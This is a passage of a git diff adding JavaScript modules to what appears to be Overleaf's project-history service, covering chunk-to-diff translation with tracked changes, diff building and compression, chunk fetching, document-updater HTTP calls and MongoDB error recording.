(error1) { + const error = error1 + return callback(error) + } + } + callback(null, builder.summarizedUpdates) +} + +export function convertToDiffUpdates( + projectId, + chunk, + pathname, + fromVersion, + toVersion, + callback +) { + let error + let version = chunk.chunk.startVersion + const { files } = chunk.chunk.history.snapshot + const builder = new UpdateSetBuilder(version, files) + + let file = null + for (const change of chunk.chunk.history.changes) { + // Because we're referencing by pathname, which can change, we + // want to get the last file in the range fromVersion:toVersion + // that has the pathname we want. Note that this might not exist yet + // at fromVersion, so we'll just settle for the last existing one we find + // after that. 
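+  // e.g. assuming 'chapter.tex' is renamed to 'intro.tex' at version 5, a
+  // diff for 'intro.tex' over versions 3..7 should follow the renamed file,
+  // so we keep overwriting `file` with the latest match inside the range
+  // instead of requiring the pathname to exist at version 3.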
+ if (fromVersion <= version && version <= toVersion) { + const currentFile = builder.getFile(pathname) + if (currentFile) { + file = currentFile + } + } + + try { + builder.applyChange(change) + } catch (error1) { + error = error1 + return callback(error) + } + version += 1 + } + // Versions act as fence posts, with updates taking us from one to another, + // so we also need to check after the final update, when we're at the last version. + if (fromVersion <= version && version <= toVersion) { + const currentFile = builder.getFile(pathname) + if (currentFile) { + file = currentFile + } + } + + // return an empty diff if the file was flagged as missing with an explicit null + if (builder.getFile(pathname) === null) { + return callback(null, { initialContent: '', updates: [] }) + } + + if (file == null) { + error = new Errors.NotFoundError( + `pathname '${pathname}' not found in range` + ) + return callback(error) + } + + WebApiManager.getHistoryId(projectId, (err, historyId) => { + if (err) { + return callback(err) + } + file.getDiffUpdates(historyId, fromVersion, toVersion, callback) + }) +} + +class UpdateSetBuilder { + constructor(startVersion, files) { + this.version = startVersion + this.summarizedUpdates = [] + + this.files = Object.create(null) + for (const pathname in files) { + // initialize file from snapshot + const data = files[pathname] + this.files[pathname] = new File(pathname, data, startVersion) + } + } + + getFile(pathname) { + return this.files[pathname] + } + + applyChange(change) { + const timestamp = new Date(change.timestamp) + let authors = _.map(change.authors, id => { + if (id == null) { + return null + } + return id + }) + authors = authors.concat(change.v2Authors || []) + this.currentUpdate = { + meta: { + users: authors, + start_ts: timestamp.getTime(), + end_ts: timestamp.getTime(), + }, + v: this.version, + pathnames: new Set([]), + project_ops: [], + } + if (change.origin) { + this.currentUpdate.meta.origin = change.origin + } + + for (const op of change.operations) { + this.applyOperation(op, timestamp, authors, change.origin) + } + + this.currentUpdate.pathnames = Array.from(this.currentUpdate.pathnames) + this.summarizedUpdates.push(this.currentUpdate) + + this.version += 1 + } + + applyOperation(op, timestamp, authors, origin) { + if (UpdateSetBuilder._isTextOperation(op)) { + this.applyTextOperation(op, timestamp, authors, origin) + } else if (UpdateSetBuilder._isRenameOperation(op)) { + this.applyRenameOperation(op, timestamp, authors) + } else if (UpdateSetBuilder._isRemoveFileOperation(op)) { + this.applyRemoveFileOperation(op, timestamp, authors) + } else if (UpdateSetBuilder._isAddFileOperation(op)) { + this.applyAddFileOperation(op, timestamp, authors) + } + } + + applyTextOperation(operation, timestamp, authors, origin) { + const { pathname } = operation + if (pathname === '') { + // this shouldn't happen, but we continue to allow the user to see the history + logger.warn( + { operation, timestamp, authors }, + 'pathname is empty for text operation' + ) + return + } + + const file = this.files[pathname] + if (file == null) { + // this shouldn't happen, but we continue to allow the user to see the history + logger.warn( + { operation, timestamp, authors }, + 'file is missing for text operation' + ) + this.files[pathname] = null // marker for a missing file + return + } + + file.applyTextOperation(authors, timestamp, this.version, operation, origin) + this.currentUpdate.pathnames.add(pathname) + } + + applyRenameOperation(operation, timestamp, 
authors) { + const { pathname, newPathname } = operation + const file = this.files[pathname] + if (file == null) { + // this shouldn't happen, but we continue to allow the user to see the history + logger.warn( + { operation, timestamp, authors }, + 'file is missing for rename operation' + ) + this.files[pathname] = null // marker for a missing file + return + } + + file.rename(newPathname) + delete this.files[pathname] + this.files[newPathname] = file + + this.currentUpdate.project_ops.push({ + rename: { pathname, newPathname }, + }) + } + + applyAddFileOperation(operation, timestamp, authors) { + const { pathname } = operation + // add file + this.files[pathname] = new File(pathname, operation.file, this.version) + + this.currentUpdate.project_ops.push({ add: { pathname } }) + } + + applyRemoveFileOperation(operation, timestamp, authors) { + const { pathname } = operation + const file = this.files[pathname] + if (file == null) { + // this shouldn't happen, but we continue to allow the user to see the history + logger.warn( + { operation, timestamp, authors }, + 'pathname not found when removing file' + ) + this.files[pathname] = null // marker for a missing file + return + } + + delete this.files[pathname] + + this.currentUpdate.project_ops.push({ remove: { pathname } }) + } + + static _isTextOperation(op) { + return Object.prototype.hasOwnProperty.call(op, 'textOperation') + } + + static _isRenameOperation(op) { + return ( + Object.prototype.hasOwnProperty.call(op, 'newPathname') && + op.newPathname !== '' + ) + } + + static _isRemoveFileOperation(op) { + return ( + Object.prototype.hasOwnProperty.call(op, 'newPathname') && + op.newPathname === '' + ) + } + + static _isAddFileOperation(op) { + return Object.prototype.hasOwnProperty.call(op, 'file') + } +} + +/** + * @param {string} content + * @param {TrackedChangeList} trackedChanges + * @returns {string} + */ +function removeTrackedDeletesFromString(content, trackedChanges) { + let result = '' + let cursor = 0 + const trackedDeletes = trackedChanges + .asSorted() + .filter(tc => tc.tracking.type === 'delete') + for (const trackedChange of trackedDeletes) { + if (cursor < trackedChange.range.start) { + result += content.slice(cursor, trackedChange.range.start) + } + // skip the tracked change itself + cursor = trackedChange.range.end + } + result += content.slice(cursor) + return result +} + +class File { + constructor(pathname, snapshot, initialVersion) { + this.pathname = pathname + this.snapshot = snapshot + this.initialVersion = initialVersion + this.operations = [] + } + + applyTextOperation(authors, timestamp, version, operation, origin) { + this.operations.push({ authors, timestamp, version, operation, origin }) + } + + rename(pathname) { + this.pathname = pathname + } + + getDiffUpdates(historyId, fromVersion, toVersion, callback) { + if (this.snapshot.stringLength == null) { + // Binary file + return callback(null, { binary: true }) + } + this._loadContentAndRanges(historyId, (error, content, ranges) => { + if (error != null) { + return callback(OError.tag(error)) + } + const trackedChanges = TrackedChangeList.fromRaw( + ranges?.trackedChanges || [] + ) + /** @type {string | undefined} */ + let initialContent + const updates = [] + + for (const operationInfo of this.operations) { + if (!('textOperation' in operationInfo.operation)) { + // We only care about text operations + continue + } + const { authors, timestamp, version, operation } = operationInfo + // Set the initialContent to the latest version we have before the diff 
+ // begins. 'version' here refers to the document version as we are + // applying the updates. So we store the content *before* applying the + // updates. + if (version >= fromVersion && initialContent === undefined) { + initialContent = removeTrackedDeletesFromString( + content, + trackedChanges + ) + } + + let ops + ;({ content, ops } = this._convertTextOperation( + content, + operation, + trackedChanges + )) + + // We only need to return the updates between fromVersion and toVersion + if (fromVersion <= version && version < toVersion) { + const update = { + meta: { + users: authors, + start_ts: timestamp.getTime(), + end_ts: timestamp.getTime(), + }, + v: version, + op: ops, + } + if (operationInfo.origin) { + update.meta.origin = operationInfo.origin + } + updates.push(update) + } + } + + if (initialContent === undefined) { + initialContent = removeTrackedDeletesFromString(content, trackedChanges) + } + callback(null, { initialContent, updates }) + }) + } + + /** + * + * @param {string} initialContent + * @param {RawEditOperation} operation + * @param {TrackedChangeList} trackedChanges + */ + _convertTextOperation(initialContent, operation, trackedChanges) { + const textOp = TextOperation.fromJSON(operation) + const textUpdateBuilder = new TextUpdateBuilder( + initialContent, + trackedChanges + ) + for (const op of textOp.ops) { + textUpdateBuilder.applyOp(op) + } + textUpdateBuilder.finish() + return { + content: textUpdateBuilder.result, + ops: textUpdateBuilder.changes, + } + } + + _loadContentAndRanges(historyId, callback) { + HistoryStoreManager.getProjectBlob( + historyId, + this.snapshot.hash, + (err, content) => { + if (err) { + return callback(err) + } + if (this.snapshot.rangesHash) { + HistoryStoreManager.getProjectBlob( + historyId, + this.snapshot.rangesHash, + (err, ranges) => { + if (err) { + return callback(err) + } + return callback(null, content, JSON.parse(ranges)) + } + ) + } else { + return callback(null, content, undefined) + } + } + ) + } +} + +class TextUpdateBuilder { + /** + * + * @param {string} source + * @param {TrackedChangeList} ranges + */ + constructor(source, ranges) { + this.trackedChanges = ranges + this.source = source + this.sourceCursor = 0 + this.result = '' + /** @type {({i: string, p: number} | {d: string, p: number})[]} */ + this.changes = [] + } + + applyOp(op) { + if (op instanceof RetainOp) { + const length = this.result.length + this.applyRetain(op) + this.trackedChanges.applyRetain(length, op.length, { + tracking: op.tracking, + }) + } + + if (op instanceof InsertOp) { + const length = this.result.length + this.applyInsert(op) + this.trackedChanges.applyInsert(length, op.insertion, { + tracking: op.tracking, + }) + } + + if (op instanceof RemoveOp) { + const length = this.result.length + this.applyDelete(op) + this.trackedChanges.applyDelete(length, op.length) + } + } + + /** + * + * @param {RetainOp} retain + */ + applyRetain(retain) { + const resultRetentionRange = new Range(this.result.length, retain.length) + const sourceRetentionRange = new Range(this.sourceCursor, retain.length) + + let scanCursor = this.result.length + if (retain.tracking) { + // We are modifying existing tracked deletes. We need to treat removal + // (type insert/none) of a tracked delete as an insertion. Similarly, any + // range we introduce as a tracked deletion must be reported as a deletion. 
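+      // e.g. assuming source 'abXcd' where 'X' is a tracked delete: retaining
+      // over 'X' with tracking type 'none' or 'insert' emits { i: 'X' } (the
+      // hidden text reappears in the UI), while retaining visible text with
+      // tracking type 'delete' emits { d: ... } (it disappears from the UI).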
+ const trackedDeletes = this.trackedChanges + .asSorted() + .filter( + tc => + tc.tracking.type === 'delete' && + tc.range.overlaps(resultRetentionRange) + ) + + const sourceOffset = this.sourceCursor - this.result.length + for (const trackedDelete of trackedDeletes) { + const resultTrackedDelete = trackedDelete.range + const sourceTrackedDelete = trackedDelete.range.moveBy(sourceOffset) + + if (scanCursor < resultTrackedDelete.start) { + if (retain.tracking.type === 'delete') { + this.changes.push({ + d: this.source.slice( + this.sourceCursor, + sourceTrackedDelete.start + ), + p: this.result.length, + }) + } + this.result += this.source.slice( + this.sourceCursor, + sourceTrackedDelete.start + ) + scanCursor = resultTrackedDelete.start + this.sourceCursor = sourceTrackedDelete.start + } + const endOfInsertionResult = Math.min( + resultTrackedDelete.end, + resultRetentionRange.end + ) + const endOfInsertionSource = Math.min( + sourceTrackedDelete.end, + sourceRetentionRange.end + ) + const text = this.source.slice(this.sourceCursor, endOfInsertionSource) + if ( + retain.tracking.type === 'none' || + retain.tracking.type === 'insert' + ) { + this.changes.push({ + i: text, + p: this.result.length, + }) + } + this.result += text + // skip the tracked delete itself + scanCursor = endOfInsertionResult + this.sourceCursor = endOfInsertionSource + + if (scanCursor >= resultRetentionRange.end) { + break + } + } + } + if (scanCursor < resultRetentionRange.end) { + // The last region is not a tracked delete. But we should still handle + // a new tracked delete as a deletion. + const text = this.source.slice( + this.sourceCursor, + sourceRetentionRange.end + ) + if (retain.tracking?.type === 'delete') { + this.changes.push({ + d: text, + p: this.result.length, + }) + } + this.result += text + } + this.sourceCursor = sourceRetentionRange.end + } + + /** + * + * @param {InsertOp} insert + */ + applyInsert(insert) { + if (insert.tracking?.type !== 'delete') { + // Skip tracked deletions + this.changes.push({ + i: insert.insertion, + p: this.result.length, + }) + } + this.result += insert.insertion + // The source cursor doesn't advance + } + + /** + * + * @param {RemoveOp} deletion + */ + applyDelete(deletion) { + const sourceDeletionRange = new Range(this.sourceCursor, deletion.length) + const resultDeletionRange = new Range(this.result.length, deletion.length) + + const trackedDeletes = this.trackedChanges + .asSorted() + .filter( + tc => + tc.tracking.type === 'delete' && + tc.range.overlaps(resultDeletionRange) + ) + .sort((a, b) => a.range.start - b.range.start) + + let scanCursor = this.result.length + const sourceOffset = this.sourceCursor - this.result.length + + for (const trackedDelete of trackedDeletes) { + const resultTrackDeleteRange = trackedDelete.range + const sourceTrackDeleteRange = trackedDelete.range.moveBy(sourceOffset) + + if (scanCursor < resultTrackDeleteRange.start) { + this.changes.push({ + d: this.source.slice(this.sourceCursor, sourceTrackDeleteRange.start), + p: this.result.length, + }) + } + // skip the tracked delete itself + scanCursor = Math.min(resultTrackDeleteRange.end, resultDeletionRange.end) + this.sourceCursor = Math.min( + sourceTrackDeleteRange.end, + sourceDeletionRange.end + ) + + if (scanCursor >= resultDeletionRange.end) { + break + } + } + if (scanCursor < resultDeletionRange.end) { + this.changes.push({ + d: this.source.slice(this.sourceCursor, sourceDeletionRange.end), + p: this.result.length, + }) + } + this.sourceCursor = sourceDeletionRange.end + } + 
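+  // finish() below flushes any remaining source text, then shifts each
+  // change's position left by the length of tracked-delete text hidden
+  // before it, e.g. a change at p: 5 behind a 2-char tracked delete is
+  // reported at p: 3, matching what the UI renders.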
+ finish() { + if (this.sourceCursor < this.source.length) { + this.result += this.source.slice(this.sourceCursor) + } + for (const op of this.changes) { + if ('p' in op && typeof op.p === 'number') { + // Maybe we have to move the position of the deletion to account for + // tracked changes that we're hiding in the UI. + op.p -= this.trackedChanges + .asSorted() + .filter(tc => tc.tracking.type === 'delete' && tc.range.start < op.p) + .map(tc => { + if (tc.range.end < op.p) { + return tc.range.length + } + return op.p - tc.range.start + }) + .reduce((a, b) => a + b, 0) + } + } + } +} diff --git a/services/project-history/app/js/DiffGenerator.js b/services/project-history/app/js/DiffGenerator.js new file mode 100644 index 0000000..57e8d5a --- /dev/null +++ b/services/project-history/app/js/DiffGenerator.js @@ -0,0 +1,274 @@ +import _ from 'lodash' +import OError from '@overleaf/o-error' + +export class ConsistencyError extends OError {} + +/** + * Container for functions that need to be mocked in tests + * + * TODO: Rewrite tests in terms of exported functions only + */ +export const _mocks = {} + +export function buildDiff(initialContent, updates) { + let diff = [{ u: initialContent }] + for (const update of updates) { + diff = applyUpdateToDiff(diff, update) + } + diff = compressDiff(diff) + return diff +} + +_mocks.compressDiff = diff => { + const newDiff = [] + for (const part of diff) { + const users = part.meta?.users ?? [] + + if (part.meta?.origin?.kind === 'history-resync') { + // Skip history resync updates. Inserts are converted to unchanged text + // and deletes are skipped, so that they effectively don't appear in the + // diff. + if (part.u != null) { + newDiff.push(part) + } else if (part.i != null) { + newDiff.push({ u: part.i }) + } + continue + } + + if (newDiff.length === 0) { + // If we haven't seen other parts yet, we have nothing to merge. + newDiff.push(part) + continue + } + + const lastPart = newDiff[newDiff.length - 1] + const lastUsers = lastPart.meta?.users ?? [] + const usersNotInBothParts = _.xor(users, lastUsers) + + if (usersNotInBothParts.length > 0) { + // If the set of users in the last part and this part are not the same, we + // can't merge. 
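+      // e.g. an insert attributed to user A followed by one attributed to
+      // user B stays as two separate parts, preserving per-user attribution;
+      // only adjacent parts with identical user sets are merged below.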
+ newDiff.push(part) + continue + } + + if (lastPart.i != null && part.i != null) { + // Merge two inserts + lastPart.i += part.i + lastPart.meta.start_ts = Math.min( + lastPart.meta.start_ts, + part.meta.start_ts + ) + lastPart.meta.end_ts = Math.max(lastPart.meta.end_ts, part.meta.end_ts) + } else if (lastPart.d != null && part.d != null) { + // Merge two deletes + lastPart.d += part.d + lastPart.meta.start_ts = Math.min( + lastPart.meta.start_ts, + part.meta.start_ts + ) + lastPart.meta.end_ts = Math.max(lastPart.meta.end_ts, part.meta.end_ts) + } else { + newDiff.push(part) + } + } + return newDiff +} + +export function compressDiff(...args) { + return _mocks.compressDiff(...args) +} + +export function applyOpToDiff(diff, op, meta) { + let consumedDiff + + let remainingDiff = diff.slice() + ;({ consumedDiff, remainingDiff } = _consumeToOffset(remainingDiff, op.p)) + const newDiff = consumedDiff + + if (op.i != null) { + newDiff.push({ + i: op.i, + meta, + }) + } else if (op.d != null) { + ;({ consumedDiff, remainingDiff } = _consumeDiffAffectedByDeleteOp( + remainingDiff, + op, + meta + )) + newDiff.push(...(consumedDiff || [])) + } + + newDiff.push(...(remainingDiff || [])) + + return newDiff +} + +_mocks.applyUpdateToDiff = (diff, update) => { + for (const op of update.op) { + if (op.broken !== true) { + diff = applyOpToDiff(diff, op, update.meta) + } + } + return diff +} + +export function applyUpdateToDiff(...args) { + return _mocks.applyUpdateToDiff(...args) +} + +function _consumeToOffset(remainingDiff, totalOffset) { + let part + const consumedDiff = [] + let position = 0 + while ((part = remainingDiff.shift())) { + const length = _getLengthOfDiffPart(part) + if (part.d != null) { + consumedDiff.push(part) + } else if (position + length >= totalOffset) { + const partOffset = totalOffset - position + if (partOffset > 0) { + consumedDiff.push(_slicePart(part, 0, partOffset)) + } + if (partOffset < length) { + remainingDiff.unshift(_slicePart(part, partOffset)) + } + break + } else { + position += length + consumedDiff.push(part) + } + } + + return { + consumedDiff, + remainingDiff, + } +} + +function _consumeDiffAffectedByDeleteOp(remainingDiff, deleteOp, meta) { + const consumedDiff = [] + let remainingOp = deleteOp + while (remainingOp && remainingDiff.length > 0) { + let newPart + ;({ newPart, remainingDiff, remainingOp } = _consumeDeletedPart( + remainingDiff, + remainingOp, + meta + )) + if (newPart != null) { + consumedDiff.push(newPart) + } + } + return { + consumedDiff, + remainingDiff, + } +} + +function _consumeDeletedPart(remainingDiff, op, meta) { + let deletedContent, newPart, remainingOp + const part = remainingDiff.shift() + const partLength = _getLengthOfDiffPart(part) + + if (part.d != null) { + // Skip existing deletes + remainingOp = op + newPart = part + } else if (partLength > op.d.length) { + // Only the first bit of the part has been deleted + const remainingPart = _slicePart(part, op.d.length) + remainingDiff.unshift(remainingPart) + + deletedContent = _getContentOfPart(part).slice(0, op.d.length) + if (deletedContent !== op.d) { + throw new ConsistencyError( + `deleted content, '${deletedContent}', does not match delete op, '${op.d}'` + ) + } + + if (part.u != null) { + newPart = { + d: op.d, + meta, + } + } else if (part.i != null) { + newPart = null + } + + remainingOp = null + } else if (partLength === op.d.length) { + // The entire part has been deleted, but it is the last part + + deletedContent = _getContentOfPart(part) + if (deletedContent !== op.d) 
{ + throw new ConsistencyError( + `deleted content, '${deletedContent}', does not match delete op, '${op.d}'` + ) + } + + if (part.u != null) { + newPart = { + d: op.d, + meta, + } + } else if (part.i != null) { + newPart = null + } + + remainingOp = null + } else if (partLength < op.d.length) { + // The entire part has been deleted and there is more + + deletedContent = _getContentOfPart(part) + const opContent = op.d.slice(0, deletedContent.length) + if (deletedContent !== opContent) { + throw new ConsistencyError( + `deleted content, '${deletedContent}', does not match delete op, '${opContent}'` + ) + } + + if (part.u) { + newPart = { + d: part.u, + meta, + } + } else if (part.i != null) { + newPart = null + } + + remainingOp = { + p: op.p, + d: op.d.slice(_getLengthOfDiffPart(part)), + } + } + + return { + newPart, + remainingDiff, + remainingOp, + } +} + +function _slicePart(basePart, from, to) { + let part + if (basePart.u != null) { + part = { u: basePart.u.slice(from, to) } + } else if (basePart.i != null) { + part = { i: basePart.i.slice(from, to) } + } + if (basePart.meta != null) { + part.meta = basePart.meta + } + return part +} + +function _getLengthOfDiffPart(part) { + return (part.u || part.d || part.i || '').length +} + +function _getContentOfPart(part) { + return part.u || part.d || part.i || '' +} diff --git a/services/project-history/app/js/DiffManager.js b/services/project-history/app/js/DiffManager.js new file mode 100644 index 0000000..69c9b2f --- /dev/null +++ b/services/project-history/app/js/DiffManager.js @@ -0,0 +1,240 @@ +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import async from 'async' +import * as DiffGenerator from './DiffGenerator.js' +import * as FileTreeDiffGenerator from './FileTreeDiffGenerator.js' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as WebApiManager from './WebApiManager.js' +import * as ChunkTranslator from './ChunkTranslator.js' +import * as Errors from './Errors.js' + +let MAX_CHUNK_REQUESTS = 10 + +/** + * Container for functions that need to be mocked in tests + * + * TODO: Rewrite tests in terms of exported functions only + */ +export const _mocks = {} + +export function getDiff(projectId, pathname, fromVersion, toVersion, callback) { + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error) { + return callback(OError.tag(error)) + } + _getProjectUpdatesBetweenVersions( + projectId, + pathname, + fromVersion, + toVersion, + (error, result) => { + if (error) { + return callback(OError.tag(error)) + } + const { binary, initialContent, updates } = result + let diff + if (binary) { + diff = { binary: true } + } else { + try { + diff = DiffGenerator.buildDiff(initialContent, updates) + } catch (err) { + return callback( + OError.tag(err, 'failed to build diff', { + projectId, + pathname, + fromVersion, + toVersion, + }) + ) + } + } + callback(null, diff) + } + ) + }) +} + +export function getFileTreeDiff(projectId, fromVersion, toVersion, callback) { + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error) { + return callback(OError.tag(error)) + } + _getChunksAsSingleChunk( + projectId, + fromVersion, + toVersion, + (error, chunk) => { + let diff + if (error) { + return callback(OError.tag(error)) + } + try { + diff = FileTreeDiffGenerator.buildDiff(chunk, fromVersion, toVersion) + } catch (error1) { + error = error1 + if (error instanceof Errors.InconsistentChunkError) { + 
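// an inconsistent chunk is an expected failure, handed back to the caller; anything else is unexpected and rethrown +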
return callback(error) + } else { + throw OError.tag(error) + } + } + callback(null, diff) + } + ) + }) +} + +export function _getChunksAsSingleChunk( + projectId, + fromVersion, + toVersion, + callback +) { + logger.debug( + { projectId, fromVersion, toVersion }, + '[_getChunksAsSingleChunk] getting chunks' + ) + _getChunks(projectId, fromVersion, toVersion, (error, chunks) => { + if (error) { + return callback(OError.tag(error)) + } + logger.debug( + { projectId, fromVersion, toVersion, chunks }, + '[_getChunksAsSingleChunk] got chunks' + ) + const chunk = _concatChunks(chunks) + callback(null, chunk) + }) +} + +_mocks._getProjectUpdatesBetweenVersions = ( + projectId, + pathname, + fromVersion, + toVersion, + callback +) => { + _getChunksAsSingleChunk(projectId, fromVersion, toVersion, (error, chunk) => { + if (error) { + return callback(OError.tag(error)) + } + logger.debug( + { projectId, pathname, fromVersion, toVersion, chunk }, + '[_getProjectUpdatesBetweenVersions] concatted chunk' + ) + ChunkTranslator.convertToDiffUpdates( + projectId, + chunk, + pathname, + fromVersion, + toVersion, + callback + ) + }) +} + +export function _getProjectUpdatesBetweenVersions(...args) { + _mocks._getProjectUpdatesBetweenVersions(...args) +} + +_mocks._getChunks = (projectId, fromVersion, toVersion, callback) => { + let chunksRequested = 0 + let lastChunkStartVersion = toVersion + const chunks = [] + + function shouldRequestAnotherChunk(cb) { + const stillUnderChunkLimit = chunksRequested < MAX_CHUNK_REQUESTS + const stillNeedVersions = fromVersion < lastChunkStartVersion + const stillSaneStartVersion = lastChunkStartVersion > 0 + logger.debug( + { + projectId, + stillUnderChunkLimit, + stillNeedVersions, + stillSaneStartVersion, + fromVersion, + lastChunkStartVersion, + chunksRequested, + }, + '[_getChunks.shouldRequestAnotherChunk]' + ) + return cb( + null, + stillUnderChunkLimit && stillNeedVersions && stillSaneStartVersion + ) + } + + function getNextChunk(cb) { + logger.debug( + { + projectId, + lastChunkStartVersion, + }, + '[_getChunks.getNextChunk]' + ) + WebApiManager.getHistoryId(projectId, (error, historyId) => { + if (error) { + return cb(OError.tag(error)) + } + HistoryStoreManager.getChunkAtVersion( + projectId, + historyId, + lastChunkStartVersion, + (error, chunk) => { + if (error) { + return cb(OError.tag(error)) + } + lastChunkStartVersion = chunk.chunk.startVersion + chunksRequested += 1 + chunks.push(chunk) + cb() + } + ) + }) + } + + getNextChunk(error => { + if (error) { + return callback(OError.tag(error)) + } + async.whilst(shouldRequestAnotherChunk, getNextChunk, error => { + if (error) { + return callback(error) + } + if (chunksRequested >= MAX_CHUNK_REQUESTS) { + error = new Errors.BadRequestError('Diff spans too many chunks') + callback(error) + } else { + callback(null, chunks) + } + }) + }) +} + +export function _getChunks(...args) { + _mocks._getChunks(...args) +} + +_mocks._concatChunks = chunks => { + chunks.reverse() + const chunk = chunks[0] + // We will append all of the changes from the later + // chunks onto the first one, to form one 'big' chunk. 
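+  // e.g. chunks fetched newest-first as [v20..v30, v10..v20] become, after
+  // the reverse() above, a single chunk starting at v10 whose history
+  // contains every change from v10 through v30.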
+ for (const nextChunk of chunks.slice(1)) { + chunk.chunk.history.changes = chunk.chunk.history.changes.concat( + nextChunk.chunk.history.changes + ) + } + return chunk +} + +function _concatChunks(...args) { + return _mocks._concatChunks(...args) +} + +// for tests +export function setMaxChunkRequests(value) { + MAX_CHUNK_REQUESTS = value +} diff --git a/services/project-history/app/js/DocumentUpdaterManager.js b/services/project-history/app/js/DocumentUpdaterManager.js new file mode 100644 index 0000000..d591c2d --- /dev/null +++ b/services/project-history/app/js/DocumentUpdaterManager.js @@ -0,0 +1,80 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import request from 'request' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import OError from '@overleaf/o-error' + +export function getDocument(projectId, docId, callback) { + if (callback == null) { + callback = function () {} + } + const url = `${Settings.apis.documentupdater.url}/project/${projectId}/doc/${docId}` + logger.debug({ projectId, docId }, 'getting doc from document updater') + return request.get(url, function (error, res, body) { + if (error != null) { + return callback(OError.tag(error)) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + try { + body = JSON.parse(body) + } catch (error1) { + error = error1 + return callback(error) + } + logger.debug( + { projectId, docId, version: body.version }, + 'got doc from document updater' + ) + return callback(null, body.lines.join('\n'), body.version) + } else { + error = new OError( + `doc updater returned a non-success status code: ${res.statusCode}`, + { project_id: projectId, doc_id: docId, url } + ) + return callback(error) + } + }) +} + +export function setDocument(projectId, docId, content, userId, callback) { + if (callback == null) { + callback = function () {} + } + const url = `${Settings.apis.documentupdater.url}/project/${projectId}/doc/${docId}` + logger.debug({ projectId, docId }, 'setting doc in document updater') + return request.post( + { + url, + json: { + lines: content.split('\n'), + source: 'restore', + user_id: userId, + undoing: true, + }, + }, + function (error, res, body) { + if (error != null) { + return callback(OError.tag(error)) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + return callback(null) + } else { + error = new OError( + `doc updater returned a non-success status code: ${res.statusCode}`, + { project_id: projectId, doc_id: docId, url } + ) + return callback(error) + } + } + ) +} diff --git a/services/project-history/app/js/ErrorRecorder.js b/services/project-history/app/js/ErrorRecorder.js new file mode 100644 index 0000000..648b53f --- /dev/null +++ b/services/project-history/app/js/ErrorRecorder.js @@ -0,0 +1,267 @@ +// @ts-check + +import { callbackify } from 'node:util' +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' +import OError from '@overleaf/o-error' +import { db } from './mongodb.js' + +/** + * @import { ProjectHistoryFailure } from './mongo-types' + */ + +/** + * @param {string} projectId + * @param {number} queueSize + * @param {Error} error + * @return {Promise<ProjectHistoryFailure>} the 
failure record + */ +async function record(projectId, queueSize, error) { + const errorRecord = { + queueSize, + error: error.toString(), + stack: error.stack ?? '', + ts: new Date(), + } + logger.debug( + { projectId, errorRecord }, + 'recording failed attempt to process updates' + ) + const result = await db.projectHistoryFailures.findOneAndUpdate( + { project_id: projectId }, + { + $set: errorRecord, + $inc: { attempts: 1 }, + $push: { + history: { + $each: [errorRecord], + $position: 0, + // only keep recent failures + $slice: 10, + }, + }, + }, + { upsert: true, returnDocument: 'after', includeResultMetadata: true } + ) + if (result.value == null) { + // Since we upsert, the result should always have a value + throw new OError('no value returned when recording an error', { projectId }) + } + return result.value +} + +async function clearError(projectId) { + await db.projectHistoryFailures.deleteOne({ project_id: projectId }) +} + +async function setForceDebug(projectId, state) { + if (state == null) { + state = true + } + logger.debug({ projectId, state }, 'setting forceDebug state for project') + await db.projectHistoryFailures.updateOne( + { project_id: projectId }, + { $set: { forceDebug: state } }, + { upsert: true } + ) +} + +// we only record the sync start time, and not the end time, because the +// record should be cleared on success. +async function recordSyncStart(projectId) { + await db.projectHistoryFailures.updateOne( + { project_id: projectId }, + { + $currentDate: { resyncStartedAt: true }, + $inc: { resyncAttempts: 1 }, + $push: { + history: { + $each: [{ resyncStartedAt: new Date() }], + $position: 0, + $slice: 10, + }, + }, + }, + { upsert: true } + ) +} + +/** + * @param projectId + */ +async function getFailureRecord(projectId) { + return await db.projectHistoryFailures.findOne({ project_id: projectId }) +} + +async function getLastFailure(projectId) { + const result = await db.projectHistoryFailures.findOneAndUpdate( + { project_id: projectId }, + { $inc: { requestCount: 1 } }, // increment the request count every time we check the last failure + { projection: { error: 1, ts: 1 } } + ) + return result && result.value +} + +async function getFailedProjects() { + return await db.projectHistoryFailures.find({}).toArray() +} + +async function getFailuresByType() { + const results = await db.projectHistoryFailures.find({}).toArray() + const failureCounts = {} + const failureAttempts = {} + const failureRequests = {} + const maxQueueSize = {} + // count all the failures and number of attempts by type + for (const result of results || []) { + const failureType = result.error + const attempts = result.attempts || 1 // allow for field to be absent + const requests = result.requestCount || 0 + const queueSize = result.queueSize || 0 + if (failureCounts[failureType] > 0) { + failureCounts[failureType]++ + failureAttempts[failureType] += attempts + failureRequests[failureType] += requests + maxQueueSize[failureType] = Math.max(queueSize, maxQueueSize[failureType]) + } else { + failureCounts[failureType] = 1 + failureAttempts[failureType] = attempts + failureRequests[failureType] = requests + maxQueueSize[failureType] = queueSize + } + } + + return { failureCounts, failureAttempts, failureRequests, maxQueueSize } +} + +async function getFailures() { + const { failureCounts, failureAttempts, failureRequests, maxQueueSize } = + await getFailuresByType() + + let attempts, failureType, label, requests + const shortNames = { + 'Error: bad response from filestore: 404': 
